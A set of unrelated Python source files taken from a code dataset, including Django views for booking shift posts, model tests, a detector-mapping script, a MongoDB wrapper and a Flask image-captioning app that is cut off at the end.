salary,\n\t\t\t\t\t\t\t\tnet_rate = net_rate,\n\t\t\t\t\t\t\t\t)\n\t\t\t\t\t\t\tdate.save()\n\t\t\t\t\t\t\tx += 1\n\t\t\t\t\t\treturn redirect('post_list')\n\n\t\t\t\t\telif selector == \"AND\":\n\t\t\t\t\t\t#create an initial date instance w/c is to be copied if male > 1\n\t\t\t\t\t\t#iterate thru male_total then create post each time\n\t\t\t\t\t\t#iterate thru male then create a post\n\n\t\t\t\t\t\t#e.g. male total = 5\n\t\t\t\t\t\tif male_total != 0:\n\t\t\t\t\t\t\twhile z < male_total:\n\t\t\t\t\t\t\t\tdate = Date(\n\t\t\t\t\t\t\t\t\tpost = post, \n\t\t\t\t\t\t\t\t\tsex_of_professional = \"Male\",\n\t\t\t\t\t\t\t\t\tstart_date = start_date,\n\t\t\t\t\t\t\t\t\tend_date = end_date,\n\t\t\t\t\t\t\t\t\tstart_time = start_time,\n\t\t\t\t\t\t\t\t\tend_time = end_time,\n\t\t\t\t\t\t\t\t\ttotal_hours = total_hours,\n\t\t\t\t\t\t\t\t\tsalary = salary,\n\t\t\t\t\t\t\t\t\tnet_rate = net_rate,\n\t\t\t\t\t\t\t\t)\n\t\t\t\t\t\t\t\tdate.save()\n\t\t\t\t\t\t\t\tz += 1\n\n\n\t\t\t\t\t\t#create an initial date instance w/c is to be copied if male > 1\n\t\t\t\t\t\t#iterate thru male_total then create post each time\n\t\t\t\t\t\tif female_total != 0:\n\t\t\t\t\t\t\twhile y < female_total:\n\t\t\t\t\t\t\t\tdate = Date(\n\t\t\t\t\t\t\t\t\tpost = post, \n\t\t\t\t\t\t\t\t\tsex_of_professional = \"Female\",\n\t\t\t\t\t\t\t\t\tstart_date = start_date,\n\t\t\t\t\t\t\t\t\tend_date = end_date,\n\t\t\t\t\t\t\t\t\tstart_time = start_time,\n\t\t\t\t\t\t\t\t\tend_time = end_time,\n\t\t\t\t\t\t\t\t\ttotal_hours = total_hours,\n\t\t\t\t\t\t\t\t\tsalary = salary,\n\t\t\t\t\t\t\t\t\tnet_rate = net_rate,\n\t\t\t\t\t\t\t\t)\n\t\t\t\t\t\t\t\tdate.save()\n\t\t\t\t\t\t\t\ty += 1\n\t\t\t\t\treturn redirect('post_list')\n\n\t\t\telif longformset.is_valid():\n\t\t\t\tfor form in longformset:\n\t\t\t\t\tselector = form.cleaned_data['selector']\n\t\t\t\t\tmale_total = form.cleaned_data['male_number']\n\t\t\t\t\tfemale_total = form.cleaned_data['female_number']\n\t\t\t\t\tstart_date = form.cleaned_data['start_date']\n\t\t\t\t\tend_date = form.cleaned_data['end_date']\n\t\t\t\t\t#start_time = form.cleaned_data['start_time']\n\t\t\t\t\t#end_time = form.cleaned_data['end_time']\n\t\t\t\t\t#total_hours = form.cleaned_data['total_hours']\n\t\t\t\t\tsalary = form.cleaned_data['salary']\n\t\t\t\t\t#net_rate = form.cleaned_data['net_rate']\n\t\t\t\t\tx = 0\n\t\t\t\t\ty = 0\n\t\t\t\t\tz = 0 \n\n\t\t\t\t\tif selector == \"OR\":\n\t\t\t\t\t\t#create an initial date instance w/c is to be copied if male > 1\n\t\t\t\t\t\t#iterate thru male_total then create post each time\n\n\t\t\t\t\t\twhile x < male_total:\n\t\t\t\t\t\t\tdate = Date(\n\t\t\t\t\t\t\t\tpost = post, \n\t\t\t\t\t\t\t\tsex_of_professional = \"Male/Female\",\n\t\t\t\t\t\t\t\tstart_date = start_date,\n\t\t\t\t\t\t\t\tend_date = end_date,\n\t\t\t\t\t\t\t\t#start_time = start_time,\n\t\t\t\t\t\t\t\t#end_time = end_time,\n\t\t\t\t\t\t\t\t#total_hours = total_hours,\n\t\t\t\t\t\t\t\tsalary = salary,\n\t\t\t\t\t\t\t\t#net_rate = net_rate,\n\t\t\t\t\t\t\t\t)\n\t\t\t\t\t\t\tdate.save()\n\t\t\t\t\t\t\tx += 1\n\t\t\t\t\t\t#return redirect('post_list')\n\n\t\t\t\t\telif selector == \"AND\":\n\t\t\t\t\t\t#create an initial date instance w/c is to be copied if male > 1\n\t\t\t\t\t\t#iterate thru male_total then create post each time\n\t\t\t\t\t\t#iterate thru male then create a post\n\n\t\t\t\t\t#e.g. male total = 5\n\t\t\t\t\t\tif male_total != 0:\n\t\t\t\t\t\t\twhile z < male_total:\n\t\t\t\t\t\t\t\tdate = Date(\n\t\t\t\t\t\t\t\t\tpost = post, \n\t\t\t\t\t\t\t\t\tsex_of_professional = \"Male\",\n\t\t\t\t\t\t\t\t\tstart_date = start_date,\n\t\t\t\t\t\t\t\t\tend_date = end_date,\n\t\t\t\t\t\t\t\t\t#start_time = start_time,\n\t\t\t\t\t\t\t\t\t#end_time = end_time,\n\t\t\t\t\t\t\t\t\t#total_hours = total_hours,\n\t\t\t\t\t\t\t\t\tsalary = salary,\n\t\t\t\t\t\t\t\t\t#net_rate = net_rate,\n\t\t\t\t\t\t\t\t)\n\t\t\t\t\t\t\t\tdate.save()\n\t\t\t\t\t\t\t\tz += 1\n\n\n\t\t\t\t\t\t#create an initial date instance w/c is to be copied if male > 1\n\t\t\t\t\t\t#iterate thru male_total then create post each time\n\t\t\t\t\t\tif female_total != 0:\n\t\t\t\t\t\t\twhile y < female_total:\n\t\t\t\t\t\t\t\tdate = Date(\n\t\t\t\t\t\t\t\t\tpost = post, \n\t\t\t\t\t\t\t\t\tsex_of_professional = \"Female\",\n\t\t\t\t\t\t\t\t\tstart_date = start_date,\n\t\t\t\t\t\t\t\t\tend_date = end_date,\n\t\t\t\t\t\t\t\t\t#start_time = start_time,\n\t\t\t\t\t\t\t\t\t#end_time = end_time,\n\t\t\t\t\t\t\t\t\t#total_hours = total_hours,\n\t\t\t\t\t\t\t\t\tsalary = salary,\n\t\t\t\t\t\t\t\t\t#net_rate = net_rate,\n\t\t\t\t\t\t\t\t)\n\t\t\t\t\t\t\t\tdate.save()\n\t\t\t\t\t\t\t\ty += 1\n\t\t\t\treturn redirect('post_list')\n\n\n\t\t\t#return render(request, 'book/success.html', )\n\treturn render(request, 'book/create_post.html', {'shortformset': shortformset, 'longformset': longformset, 'post_form': post_form,})\n\ndef load_posts(request, method=\"POST\"):\n\n# get the word from where textbox on keydown\n\tif request.method == \"POST\":\n\t\tif request.POST.get('request') == 1:\n\t\t\tterm = request.POST.get('search')\n\t\t\tposts = Post.objects.filter(string__contains=term)\n\t\t\t\n\t\t\tresults = []\n\t\t\t\n\t\t\tfor r in posts:\n\t\t\t\trow_result = []\n\t\t\t\trow_result[\"value\"] = r.post_id\n\t\t\t\trow_result[\"label\"] = r.where\n\t\t\t\tresults.append(row_result)\n\n\t\t\tdata = json.dumps(results)\n\t\t\texit()\n\n\t\telif request.POST.get('request') == 2:\n\t\t\tuserid = request.POST.get('userid')\n\t\t\tpost_details = Post.objects.filter(id=userid)\n\t\t\tuser_array = []\n\n\t\t\tfor q in post_details:\n\t\t\t\tresult = []\n\t\t\t\t#user_id = q['post_id']\n\t\t\t\tresult[\"user_id\", q['post_id']]\n\t\t\t\tresult[\"profession\", q['profession']]\n\n\t\t\t\tresult[\"qualification\", q['qualification']]\n\t\t\t\tresult[\"pay_given\", q['pay_given']]\n\t\t\t\tresult[\"incentives\", q['incentives']]\n\t\t\t\tresult[\"incentives_given\", q['incentives_given']]\n\t\t\t\tresult[\"requirements\", q['requirements']]\n\t\t\t\tresult[\"expected_number_patients\", q['expected_number_patients']]\n\t\t\t\tresult[\"toxicity\", q['toxicity']]\n\t\t\t\tresult[\"person_to_look_for\", q['person_to_look_for']]\n\n\t\t\t\t#user_array[] = [\"user_id\": user_id, \"profession\": profession, \"qualification\": qualification, \"pay_given\": pay_given, \"incentives\": incentives, \"incentives_given\": incentives_given, \"requirements\": requirements, \"expected_number_patients\": expected_number_patients, \"toxicity\": toxicity, \"person_to_look_for\": person_to_look_for]\n\t\t\t\tuser_array.append(result)\n\n\t\t\tdata = json.dumps(user_array)\n\t\t\texit()\n\n\telse:\n\t\tdata = 'fail'\n\t\tmimetype = 'application/json'\n\n\treturn HttpResponse(data, mimetype)\n\ndef post_list(request):\n\t#error_message = \"Currently, there are no posts.\"\n\t#posts_list = Date.objects.filter(is_taken=False).select_related('post')\n\tposts_list = Date.objects.filter(is_taken=False).select_related('post').order_by('start_date')\n\treturn render(request, 'book/posts_list.html', {'posts_list': posts_list, 'error_message':\"Currently, there are no posts.\",})\n\ndef post_details(request, post_id, date_id):\n\tpass\n\t# get the post details\n\t# get the date details\n\t# pass them into details page\n\t\ndef take_post(request, user_id, date_id):\n\tuser = get_object_or_404(User, pk=user_id)\n\tdate_taken = get_object_or_404(Date, pk=date_id)\n\tpost_taken = get_object_or_404(Post, date__pk=date_id)\n\tdate_taken.is_taken = True\n\tdate_taken.save()\n\n\tnew_post_taken = Taken_Post(\n\t\tpost = post_taken,\n\t\tdate = date_taken,\n\t\ttaker = user\n\t\t)\n\tnew_post_taken.save()\n\n\treturn redirect('profile', user_id=user.pk)\n\ndef cancel_post(request, user_id, date_id):\n\tuser = get_object_or_404(User, pk=user_id)\n\tdate_taken = get_object_or_404(Date, pk=date_id)\n\tdate_taken.is_taken = False\n\tdate_taken.save()\n\t#SOMETHING WRONG WITH THE FF CODE MAYBE USE WHERE DATE ID IS AND USER ID IS\n\trelated_post = Taken_Post.objects.filter(date__id=date_id)\n\t#related_post = get_object_or_404(Taken_Post, date__id=date_id)\n\trelated_post.delete()\n\t#delete or UPTDATE the taken post ===> DOES NOT SEEM TO WORK\n\n\treturn redirect('profile', user_id=user.pk)\n\ndef profile(request, user_id):\n\t#error_message = \"You haven't taken any posts.\"\n\tmy_posts = Taken_Post.objects.filter(taker=user_id).select_related('date','post').exclude(date__is_taken=False)\n\treturn render(request, 'book/profile.html', {'my_posts': my_posts, 'error_message':\"You haven't taken any posts.\",})\n\n\ndef message_recruiter(request):\n\t#if post is taken or not\n\t#if taker cancelled\n\tpass\n\ndef populate_textboxes(request):\n\tif request.method == \"POST\":\n\t\twhere = request.POST.get('where', None)\n\telse:\n\t\twhere = ''\n\n\t#REMOVE DUPLICATES\n\tsimilar_posts = Post.objects.filter(where__icontains=where)\n\t#return json list of posts\n\treturn render(request, 'book/ajax_search.html', {'posts':similar_posts,})\n\ndef complete_fields(request):\n\tif request.method == \"POST\":\n\t\tpost_id = request.POST.get('post_id', None)\n\telse:\n\t\tpost_id = ''\n\n\tpost = get_object_or_404(Post, pk=post_id)\n\t\n\tpost_details = {\n\t\t\"profession\": post.profession,\n\t\t\"setting\": post.setting,\n\t\t\"pay_given\": post.pay_given,\n\t\t\"incentives\": post.incentives,\n\t\t\"incentives_given\": post.incentives_given,\n\t\t\"requirements\": post.requirements,\n\t\t\"expected_number_patients\": post.expected_number_patients,\n\t\t\"person_to_look_for\":post.person_to_look_for,\n\t\t\"person_to_relieve\":post.person_to_relieve,\n\t\t\"others\": post.others\n\t};\n\n\treturn JsonResponse(post_details)\n\ndef sort_post(request, method=\"POST\"):\n\t#GET THE ID OF THE POSTS\n\terror_message = \"Currently, there are no posts.\"\n\n\tif request.method == \"POST\":\n\t\tchosen_category = request.POST.get('chosen_category')\n\t\tdates = request.POST.getlist('date_array[]')\n\n\t\tdate_array = Date.objects.filter(id__in=dates)\n\n\t\t'''for x in dates:\n\t\t\tdate = Date.objects.get(pk=x)\n\t\t\tdate_array.append(date)'''\n\n\t\tif chosen_category == \"date\":\n\t\t\tposts_list = date_array.filter(is_taken=False).select_related('post').order_by('start_date')\n\t\t\t#posts_list = Date.objects.filter(is_taken=False).select_related('post').order_by('start_date')\n\n\t\telif chosen_category == \"net_rate\":\n\t\t\tposts_list = date_array.filter(is_taken=False).select_related('post').order_by('-net_rate')\n\t\t\t#posts_list = Date.objects.filter(is_taken=False).select_related('post').order_by('-net_rate')\n\n\t\telif chosen_category == \"location\":\n\t\t\t#use posts_list = Date.objects.filter(post__where__contains = location)\n\t\t\tposts_list = date_array.filter(is_taken=False).select_related('post').order_by('post__where')\n\t\t\t#posts_list = Date.objects.filter(is_taken=False).select_related('post').order_by('post__where')\n\n\telse:\n\t\t#posts_list = Date.objects.filter(is_taken=False).select_related('post').order_by('-start_date')\n\t\tposts_list = date_array.filter(is_taken=False).select_related('post').order_by('start_date')\n\t\treturn render(request, 'book/posts.html', {'posts_list': posts_list, 'error_message':\"Currently, there are no posts.\",})\n\n\t'''posts_list = Date.objects.filter(post__id=post_id).filter(is_taken=False)\n\treturn render(request, 'book/posts_list.html', {'posts_list': posts_list, 'error_message':\"Currently, there are no posts.\",})\n\t'''\n\treturn render(request, 'book/posts.html', {'posts_list': posts_list, 'error_message':error_message,})\n\ndef search_post(request, method=\"POST\"):\n\tif request.method == \"POST\":\n\t\twhere = request.POST.get('post', None)\n\telse:\n\t\twhere = ''\n\n\t#REMOVE DUPLICATES\n\tsimilar_posts = Post.objects.filter(where__icontains=where)\n\t#return json list of posts\n\treturn render(request, 'book/search_bar_results.html', {'posts':similar_posts,})\n\t#get the keyword on search bar\n\t#filter posts based on keyword\n\t#return list\n\ndef show_searched_post(request, post_id):\n\t#MAYBE INCLUDE TAKEN DATES BUT SPECIFY AT TEMPLATE LEVEL USING CHECK ICIONS\n\tposts_list = Date.objects.filter(post__id=post_id).filter(is_taken=False)\n\treturn render(request, 'book/posts_list.html', {'posts_list': posts_list, 'error_message':\"Currently, there are no posts.\",})\n\n\n","sub_path":"book/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":17467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"218487804","text":"import os\nfrom datetime import date\nfrom unittest.mock import MagicMock\n\nfrom django.core.files import File\nfrom django.test import TestCase\n\nfrom ..models import Maid\n\nclass TestMaid(TestCase):\n def test_model_should_have_defined_fields(self):\n # Given\n Maid.objects.create(\n name='BBBBBBBBBBBBBBBBBBBBBBBB',\n birthdate=date(1998, 4, 29),\n description='Super Maid',\n certificate='Best Maid 2012',\n salary=4000\n )\n\n # When\n maid = Maid.objects.last()\n\n # Then\n assert maid.name == 'BBBBBBBBBBBBBBBBBBBBBBBB'\n assert maid.birthdate == date(1998 , 4 , 29)\n assert maid.description == 'Super Maid'\n assert maid.certificate == 'Best Maid 2012'\n assert maid.salary == 4000\n\n def test_model_should_have_image_fields(self):\n # Given\n mock = MagicMock(spec=File)\n mock.name = 'profile.png'\n\n Maid.objects.create(\n profile_image=mock,\n name='BBBBBBBBBBBBBBBBBBBBBBBB',\n birthdate=date(1998, 4, 29),\n description='Super Maid',\n certificate='Best Maid 2012',\n salary=4000\n )\n\n # When\n maid = Maid.objects.last()\n\n # Then\n assert maid.profile_image.name == 'profile.png'\n\n os.remove('media/profile.png')\n\n def test_model_should_have_created_and_updated_fields(self):\n # Given\n Maid.objects.create(\n name='BBBBBBBBBBBBBBBBBBBBBBBB',\n birthdate=date(1998, 4, 29),\n description='Super Maid',\n certificate='Best Maid 2012',\n salary=4000\n )\n\n # When\n maid = Maid.objects.last()\n\n # Then\n assert maid.created is not None\n assert maid.modified is not None\n\n\n\n","sub_path":"homemaid/maids/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":1832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"186770540","text":"# -*- coding: utf-8 -*-\nfrom sys import argv\nimport re\n\n# FEB/A to PAB adapter HV mapping\nhvMap = [\t4, 4, \\\n\t\t3, 3, \\\n\t\t5, 5, \\\n\t\t2, 2, \\\n\t\t6, 6, \\\n\t\t1, 1, \\\n\t\t7, 7, \\\n\t\t0, 0 \\\n\t]\n\t\n\ndef main(argv):\n\tinputFile = open(argv[1], \"r\")\n\toutputFile = open(argv[2], \"w\")\n\n\tregex = re.compile(r'([0-9]+)\\s([0-9]+)\\s([0-9]+)\\s([0-9]+)\\s([0-9\\.]+)\\s([0-9\\.]+)\\s([0-9\\.]+)\\s([0-9]+).*')\n\tlines = [ line for line in inputFile]\n\tfor board in range(2):\n\t\tfor line in lines:\t\t\t\n\t\t\tm = regex.match(line)\n\t\t\tassert m is not None\n\t\t\t\n\t\t\tchannel, region, xi, yi, x, y, z, hv = m.groups()\n\t\t\tchannel = int(channel)\n\t\t\tregion = int(region)\n\t\t\txi = int(xi)\n\t\t\tyi = int(yi)\n\t\t\tx = float(x)\n\t\t\ty = float(x)\n\t\t\tz = float(z)\n\t\t\thv = int(hv)\n\n\t\t\tchannel = 128 * board + channel\n\t\t\tregion = board\n\n\t\t\t# Mirror board\n\t\t\tif board == 1:\n\t\t\t\txi = 15 - xi\n\t\t\t\tx = (3.6 * 15) - x\n\n\t\t\tif board == 0:\n\t\t\t\tz = -50.0\n\t\t\telse:\n\t\t\t\tz = 50.0\n\t\t\thv = hvMap[hv] + 8 * board\n\n\t\t\toutputFile.write(\"%d\\t%d\\t%d\\t%d\\t%f\\t%f\\t%f\\t%d\\n\" % (channel, region, xi, yi, x, y, z, hv))\n\n\toutputFile.close()\n\tinputFile.close()\n\t\t\n\n\nif __name__ == '__main__':\n\tmain(argv)","sub_path":"sw_daq/aDAQ/TOFPET/FEBA_PAB_MEZ2.map.py","file_name":"FEBA_PAB_MEZ2.map.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"336142973","text":"from __future__ import absolute_import\n\nfrom graphql.execution.base import ResolveInfo\n\nfrom dagster import check\nfrom dagster.core.execution.api import create_execution_plan\n\nfrom ..fetch_pipelines import get_pipeline_def_from_selector\nfrom ..fetch_runs import get_validated_config\nfrom ..utils import ExecutionMetadata, ExecutionParams, capture_dauphin_error\nfrom .utils import _check_start_pipeline_execution_errors, _create_pipeline_run\n\n\n@capture_dauphin_error\ndef launch_pipeline_reexecution(graphene_info, execution_params):\n return _launch_pipeline_execution(graphene_info, execution_params, is_reexecuted=True)\n\n\n@capture_dauphin_error\ndef launch_pipeline_execution(graphene_info, execution_params):\n return _launch_pipeline_execution(graphene_info, execution_params)\n\n\ndef _launch_pipeline_execution(graphene_info, execution_params, is_reexecuted=False):\n check.inst_param(graphene_info, 'graphene_info', ResolveInfo)\n check.inst_param(execution_params, 'execution_params', ExecutionParams)\n\n if is_reexecuted:\n # required fields for re-execution\n execution_metadata = check.inst_param(\n execution_params.execution_metadata, 'execution_metadata', ExecutionMetadata\n )\n check.str_param(execution_metadata.root_run_id, 'root_run_id')\n check.str_param(execution_metadata.parent_run_id, 'parent_run_id')\n\n error_type = 'RunLauncherNotDefinedError'\n success_type = (\n 'LaunchPipelineExecutionSuccess'\n if not is_reexecuted\n else 'LaunchPipelineReexecutionSuccess'\n )\n instance = graphene_info.context.instance\n run_launcher = instance.run_launcher\n\n if run_launcher is None:\n return graphene_info.schema.type_named(error_type)()\n\n pipeline_def = get_pipeline_def_from_selector(graphene_info, execution_params.selector)\n\n get_validated_config(\n pipeline_def,\n environment_dict=execution_params.environment_dict,\n mode=execution_params.mode,\n )\n\n execution_plan = create_execution_plan(\n pipeline_def, execution_params.environment_dict, mode=execution_params.mode,\n )\n\n _check_start_pipeline_execution_errors(graphene_info, execution_params, execution_plan)\n\n run = instance.launch_run(_create_pipeline_run(instance, pipeline_def, execution_params))\n\n return graphene_info.schema.type_named(success_type)(\n run=graphene_info.schema.type_named('PipelineRun')(run)\n )\n","sub_path":"python_modules/dagster-graphql/dagster_graphql/implementation/execution/launch_execution.py","file_name":"launch_execution.py","file_ext":"py","file_size_in_byte":2438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"78463536","text":"from typing import Union\n\nfrom pymongo import MongoClient\nfrom pymongo.collection import Collection\nfrom .monkey import patch\nfrom .scheme import Scheme, _signals_hook, _validate_hook, _sort_hook\n\n\nclass Database(object):\n def __init__(self,\n client: Union[None, MongoClient]=None,\n database_name: Union[None, str]=None,\n indexes_warn_level: int = 0):\n\n self.database_name = database_name\n self.client = client\n self.indexes_warn_level = indexes_warn_level\n\n self._registered_schemes = {}\n\n self.database = self.client.get_database(self.database_name)\n\n if self.indexes_warn_level:\n self.check_indexes()\n\n patch(_validate_hook, _signals_hook, _sort_hook)\n\n def check_indexes(self):\n for scheme_name, scheme in self.get_registered_schemes().items():\n scheme.check_indexes()\n\n def _register_schemes(self):\n \"\"\" This method collect all database instance properties, which have\n class base `Scheme` and cache it in `_registered_schemes`\n \"\"\"\n for name in dir(self):\n field = getattr(self, name)\n if isinstance(field, Scheme):\n self._registered_schemes[field._name] = field\n\n def get_registered_schemes(self):\n \"\"\" This method return list of registered schemes if this database, or\n register schemes and then return it.\n Returns: List of Schemes\n \"\"\"\n if not self._registered_schemes:\n self._register_schemes()\n return self._registered_schemes\n\n def get_scheme(self, name):\n \"\"\" This method return `Scheme` instance registered in this database or\n `None` if scheme does not registered\n Returns: Scheme instance or None\n \"\"\"\n return self.get_registered_schemes().get(name, None)\n\n def _update_all_indexes_cache(self):\n \"\"\" This method update indexes cache for each registered scheme\"\"\"\n for scheme in self.get_registered_schemes():\n scheme.update_indexes_cache()\n\n def __getitem__(self, item):\n return getattr(self, item)\n\n def __repr__(self):\n return repr(self.client.get_database(self.database_name))\n\n def __getattr__(self, item):\n \"\"\"\n Args:\n item:\n Returns:\n bounded method of pymongo db instance (wrapper) or\n registered scheme\n Raises:\n AttributeError if attribute is not bounded method of pymongo db\n instance and if scheme with that name does not registered on this\n corset database\n \"\"\"\n collection_or_method = getattr(self.database, item)\n\n if isinstance(collection_or_method, Collection):\n scheme = self.__getattribute__(item)\n if not scheme:\n msg = \"Scheme with name {} does not registered\"\n raise AttributeError(msg.format(item))\n else:\n return scheme\n elif callable(collection_or_method):\n def wrapper(*args, **kwargs):\n \"\"\"wrapper for collection#drop(db.test)\"\"\"\n args = list(args)\n for index, arg in enumerate(args):\n if isinstance(arg, Scheme):\n args[index] = arg._collection\n return collection_or_method(*args, **kwargs)\n return wrapper\n else:\n return collection_or_method\n","sub_path":"pymongo_corset/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":3473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"119103324","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nn_0 = 20 #initial number of individuals\nu = 0.01 #background mortality rate\nP = 0 #max predation rate\ns_pref = 2 #predators prefered prey body size\ngamma = 1 #strength of predators preference\nr_min = 1 # minimum reproduction rate of mature individual\ng_min = 1 #minimum growth rate\nalpha = 0.1 #SD in \"mutational\" kernel (random normal with mean 0)\n\nsim_id = 'ninit%d_u%r_P%r_spref%r_gamma%r_rmin%r_gmin%r_alpha%r' %(n_0,u,P,s_pref,gamma,r_min,g_min,alpha)\n\n#get data from simulation\ntimes,n = np.loadtxt('abundance_%s.dat' %(sim_id),skiprows=1, unpack=True)\ntimes,s = np.loadtxt('meansize_%s.dat' %(sim_id),skiprows=1, unpack=True)\ntimes,smat = np.loadtxt('meansizematurity_%s.dat' %(sim_id),skiprows=1, unpack=True)\n\nfig1 = plt.figure()\n\nplt1 = plt.subplot(311)\nplt1.plot(times, n)\nplt1.set_ylabel('abundance')\n\nplt2 = plt.subplot(312)\nplt2.plot(times, s)\nplt2.set_ylabel('mean size')\n\nplt3 = plt.subplot(313)\nplt3.plot(times, smat)\nplt3.set_ylabel('mean size at maturity')\nplt3.set_xlabel('time')\n\nfig1.savefig('plot_%s.png' %(sim_id))","sub_path":"SIMULATIONS/EvoPlot.py","file_name":"EvoPlot.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"261418986","text":"array_a = [1, 2, 3, 4]\narray_b = [5, 6, 7, 8]\n\n\ndef merge(array1, array2):\n array_c = []\n array1_idx = 0\n array2_idx = 0\n while array1_idx < len(array1) and array2_idx < len(array2):\n if array1[array1_idx] < array2[array2_idx]:\n array_c.append(array1[array1_idx])\n array1_idx += 1\n else:\n array_c.append(array2[array2_idx])\n array2_idx += 1\n\n if array1_idx == len(array1):\n while array2_idx < len(array2):\n array_c.append(array2[array2_idx])\n array2_idx += 1\n if array2_idx == len(array2):\n while array1_idx < len(array1):\n array_c.append(array1[array1_idx])\n array1_idx += 1\n return array_c\n\n\nprint(merge(array_a, array_b)) # [1, 2, 3, 4, 5, 6, 7, 8] 가 되어야 합니다!","sub_path":"week_3/04_merge.py","file_name":"04_merge.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"260373441","text":"from flask import current_app\nimport requests \n\ndef weather_by_city(lat, lon):\n\n weather_url = current_app.config[\"WEATHER_URL\"]\n params = {\n 'lat': lat,\n 'lon': lon,\n 'units': 'metric',\n 'lang': 'ru',\n 'exclude': 'minutely',\n 'appid': current_app.config[\"WEATHER_API_KEY\"]\n }\n try:\n result = requests.get(weather_url, params = params)\n result.raise_for_status()\n weather = result.json()\n\n if 'current' in weather:\n try:\n return weather['current']\n except (IndexError, TypeError):\n return False\n except(requests.RequestException, ValueError):\n print('Сетевая ошибка')\n return False\n\n\n return False\n\nif __name__ == '__main__':\n print(weather_by_city('55.89','37.47'))","sub_path":"webapp/weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"652745195","text":"#!/usr/bin/env python\n#\n### modified date: 2013/11/21\n#\n\nfrom operator import itemgetter, attrgetter\nfrom gaussian import *\nfrom vasp import *\n\n__author__ = \"\"\n__date__ = \"2013/11/21\"\n\n__version__ = \"$Revision: 0.1$\"\n\n\ndef gjf2poscar(gjf, poscar):\n \"\"\" Gaussain GJF convert VASP POSCAR\n gjf: {GJF}\n poscar: {POSCAR}\n \"\"\"\n poscar.setLattice(gjf._lattice_.getVectors() )\n for a in gjf._atoms_:\n poscar.addAtom(a)\n\n#def poscar2gjf(poscar, gjf, elements = ['A', 'B', 'C', 'D']):\ndef poscar2gjf(poscar, gjf, elements = None):\n \"\"\" VASP POSCAR convert Gaussain GJF\n poscar: {POSCAR}\n gjf: {GJF}\n elements: {string array}\n \"\"\"\n poscar.directToCartesian()\n if elements != None:\n poscar.setElementsType(elements)\n for a in poscar._atoms_:\n gjf.addAtom(a)\n gjf.setLattice(poscar.getLattice().getVectors() )\n# for v in poscar.getLattice().getVectors():\n# tmp1, tmp2, tmp3 = v.getBasis()\n# a = Atom('Tv', tmp1, tmp2, tmp3)\n# gjf.addAtom(a)\n\n\nif __name__ == \"__main__\":\n import sys\n import os\n\n pass\n","sub_path":"gvbridge/bin/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"213939578","text":"from flask import Flask,render_template, url_for , redirect\r\nfrom flask import request, send_from_directory\r\nimport numpy\r\nfrom numpy import array\r\nfrom numpy import argmax\r\nfrom PIL import Image\r\nimport pickle\r\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\r\nimport os\r\nimport tensorflow\r\nfrom tensorflow.keras.applications.vgg16 import VGG16, preprocess_input\r\nfrom tensorflow.keras.preprocessing.image import load_img, img_to_array\r\nfrom tensorflow.keras.models import load_model, Model\r\nfrom tensorflow.keras.preprocessing import image\r\n\r\n\r\napp=Flask(__name__,template_folder='template')\r\n\r\n# RELATED TO THE SQL DATABASE\r\napp.config['SECRET_KEY'] = '5891628bb0b13ce0c676dfde280ba245'\r\n#app.config[\"SQLALCHEMY_DATABASE_URI\"] = \"sqlite:///site.db\"\r\n\r\n\r\n#from this import SQLAlchemy\r\n\r\n\r\ndir_path = os.path.dirname(os.path.realpath(__file__))\r\n\r\nUPLOAD_FOLDER = 'uploads'\r\nSTATIC_FOLDER = 'static'\r\n\r\nwith open('tokenizer.pkl', 'rb') as f:\r\n data = pickle.load(f)\r\n\r\ndef extract_features(filename):\r\n model = VGG16()\r\n model.layers.pop()\r\n model = Model(inputs=model.inputs, outputs=model.layers[-2].output)\r\n image = load_img(filename, target_size=(224, 224))\r\n image = img_to_array(image)\r\n image = image.reshape((1, image.shape[0], image.shape[1], image.shape[2]))\r\n image = preprocess_input(image)\r\n feature = model.predict(image, verbose=0)\r\n return feature\r\n\r\ndef word_for_id(integer, tokenizer):\r\n for word, index in tokenizer.word_index.items():\r\n if index == integer:\r\n return word\r\n return None\r\n\r\n# Function for generating descriptions\r\ndef generate_desc(model, tokenizer, photo, max_length):\r\n in_text = 'startseq'\r\n for i in range(max_length):\r\n sequence = tokenizer.texts_to_sequences([in_text])[0]\r\n sequence = pad_sequences([sequence], maxlen=max_length)\r\n yhat = model.predict([photo,sequence], verbose=0)\r\n yhat = argmax(yhat)\r\n word = word_for_id(yhat, tokenizer)\r\n if word is None:\r\n break\r\n in_text += ' ' + word\r\n if word == 'endseq':\r\n break\r\n return in_text\r\n\r\n\r\n# procesing uploaded file and predict it\r\n@app.route('/upload', methods=['POST','GET'])\r\ndef upload_file():\r\n if request.method == 'GET':\r\n return render_template('index.html')\r\n else:\r\n try:\r\n file = request.files['image']\r\n full_name = os.path.join(UPLOAD_FOLDER, file.filename)\r\n file.save(full_name)\r\n photo = extract_features(full_name)\r\n #print(\"After extraction :\")\r\n #print(photo.shape)\r\n model= load_model(\"model_9.h5\")\r\n #print(model.summary())\r\n description= generate_desc(model, data, photo, 34)\r\n descript= description.split(\" \")\r\n descript= \" \".join(descript[1:-1])\r\n return render_template('predict.html', story= descript, image_file_name= file.filename)\r\n except :\r\n flash(\"Please select the image first !!\", \"success\") \r\n return redirect(url_for(\"caption\"))\r\n\r\n@app.route('/uploads/')\r\ndef send_file(filename):\r\n return 